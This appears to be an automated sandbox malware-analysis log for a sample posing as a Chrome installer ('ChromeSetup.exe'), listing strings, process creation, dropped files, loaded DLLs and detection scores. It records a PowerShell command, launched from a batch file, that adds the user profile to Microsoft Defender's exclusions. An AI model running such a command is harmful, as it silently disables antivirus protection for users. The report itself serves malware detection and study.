Source: javaw.exe, 00000002.00000002.3385302759.000000000A5FD000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078204806.00000000157D4000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/string-interning
Source: javaw.exe, 00000002.00000003.1078204806.00000000157D4000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/string-interningfeature
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/validation
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/lexical-handler
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/lexical-handler.
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/xml-string
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/xml-string?
Source: powershell.exe, 00000005.00000002.1091230564.0000000004951000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBAr
Source: powershell.exe, 00000005.00000002.1093282660.00000000059B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1093282660.00000000059B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1093282660.00000000059B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: svchost.exe, 00000007.00000003.1203071644.000001C7D6B43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000007.00000003.1203071644.000001C7D6B10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 00000005.00000002.1091230564.0000000004AA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1095173503.0000000007001000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ion=v4.5
Source: powershell.exe, 00000005.00000002.1093282660.00000000059B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004050F9
Source: C:\Users\user\Desktop\ChromeSetup.exe Code function: 0_2_004044E8 lstrlenW,wsprintfW,SetDlgItemTextW,GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044E8
Source: C:\Users\user\Desktop\ChromeSetup.exe Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 0_2_004038AF
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\ChromeSetup.exe Code function: 0_2_0040737E 0_2_0040737E
Source: C:\Users\user\Desktop\ChromeSetup.exe Code function: 0_2_00406EFE 0_2_00406EFE
Source: C:\Users\user\Desktop\ChromeSetup.exe Code function: 0_2_004079A2 0_2_004079A2
Source: C:\Users\user\Desktop\ChromeSetup.exe Code function: 0_2_004049A8 0_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Code function: 1_2_00405D30 1_2_00405D30
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Code function: 1_2_004013B0 1_2_004013B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00EFB4D0 5_2_00EFB4D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00EFB4A8 5_2_00EFB4A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_083A3AA8 5_2_083A3AA8
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JAWTAccessBridge-32.dll 532D049E0D7A265754902C23B0F150D665A78A3D6FE09AD51C9BE8C29D574A3D
Source: C:\Users\user\Desktop\ChromeSetup.exe Code function: String function: 004062CF appears 57 times
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Code function: String function: 00406E10 appears 37 times
Source: ChromeSetup.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal63.evad.winEXE@13/217@0/2
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Code function: 1_2_00401ED0 GetLastError,puts,ShellExecuteA,printf,fclose,MessageBoxA,FormatMessageA,strlen,strcat,LocalFree,fprintf,fprintf,fprintf, 1_2_00401ED0
Source: C:\Users\user\Desktop\ChromeSetup.exe Code function: 0_2_00402535 CoCreateInstance, 0_2_00402535
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Code function: 1_2_00404740 FindResourceExA,LoadResource,LockResource,fprintf,FindResourceExA,LoadResource,LockResource,fprintf,strchr,strlen,strcpy,FindResourceExA,LoadResource,LockResource,fprintf,strchr,strlen,strcpy,strncpy,strlen,strcat,strncpy,strlen,strcat,FindResourceExA,LoadResource,LockResource,atoi,SetLastError,SetLastError,SetLastError,strcpy,fprintf,FindResourceExA,LoadResource,LockResource,atoi,strcpy,fprintf,fprintf,SetLastError,SetLastError,fprintf, 1_2_00404740
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\RoadSpecialized-Launcher
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6976:120:WilError_03
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\nsmFBF2.tmp
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\97d84ae1f15f1791152b8995b44f6da3.bat
Source: ChromeSetup.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ChromeSetup.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\ChromeSetup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ChromeSetup.exe ReversingLabs: Detection: 47%
Source: ChromeSetup.exe Virustotal: Detection: 40%
Source: ChromeSetup.exe String found in binary or memory: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\lib\security
Source: RoadSpecialized-Launcher.exe String found in binary or memory: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00
Source: RoadSpecialized-Launcher.exe String found in binary or memory: -Dfile.encoding=UTF-8 -classpath "C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe" org.develnext.jphp.ext.javafx.FXLauncher
Source: RoadSpecialized-Launcher.exe String found in binary or memory: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher
Source: RoadSpecialized-Launcher.exe String found in binary or memory: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File read: C:\Users\user\Desktop\ChromeSetup.exe
Source: unknown Process created: C:\Users\user\Desktop\ChromeSetup.exe "C:\Users\user\Desktop\ChromeSetup.exe"
Source: C:\Users\user\Desktop\ChromeSetup.exe Process created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Process created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe "C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe" org.develnext.jphp.ext.javafx.FXLauncher
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\97d84ae1f15f1791152b8995b44f6da3.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: d3d9.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
